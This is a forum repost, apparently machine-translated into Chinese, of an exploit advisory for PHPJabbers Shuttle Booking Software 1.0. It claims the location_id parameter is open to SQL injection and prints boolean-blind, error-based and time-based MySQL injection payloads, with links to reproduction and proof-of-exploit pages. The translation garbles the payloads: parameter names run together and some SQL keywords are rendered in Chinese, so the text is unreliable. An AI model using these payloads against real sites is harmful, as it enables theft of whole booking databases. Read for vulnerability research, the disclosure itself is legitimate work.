H

班车- 预订软件v1.0-多sqli

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title:穿梭式预订- 软件v1.0-多sqli
##作者: nu11secur1ty
## date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionpricing
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
location_id参数似乎很容易受到SQL注入的影响
攻击。在location_id参数中提交了一个报价,
并返回了数据库错误消息。那时有两个单语
提交,错误消息消失了。
攻击者可以轻松地从数据库中窃取所有信息
这个网络应用程序!
警告!所有您的:要小心您购买的东西!这将是您的责任!
状态:高临界脆弱性
[+]有效载荷:
``MySQL
---
参数: location_id(get)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
PAYLOAD:控制器=PJFRONTPUBLICACTION=PJACTIONGEGGETDROPOFFSINDEX=348LLOCATION_ID=3''')
和1347=1347和('mvss'='mvsstraveling=from
type:基于错误的
title: mysql=5.6和基于错误的- 在哪里,有,订购或
小组by rable(gtid_subset)
PAYLOAD:控制器=PJFRONTPUBLICACTION=PJACTIONGEGGETDROPOFFSINDEX=348LLOCATION_ID=3''')
和gtid_subset(Concat(0x716b786a71,(选择)
(ELT(9416=9416,1))),0x71706B7071),9416)和
('doqc'='doqctraveling=来自
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD:控制器=PJFRONTPUBLICACTION=PJACTIONGEGGETDROPOFFSINDEX=348LLOCATION_ID=3''')
(从(select(Sleep(15)))POQP选择1087)和
('eeyq'='eeyqtraveling=来自
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve...rs/2023/shuttle-booking-booking-software-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-software-10-multiple.html)
##时间花费:
01:47:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
 
后退
顶部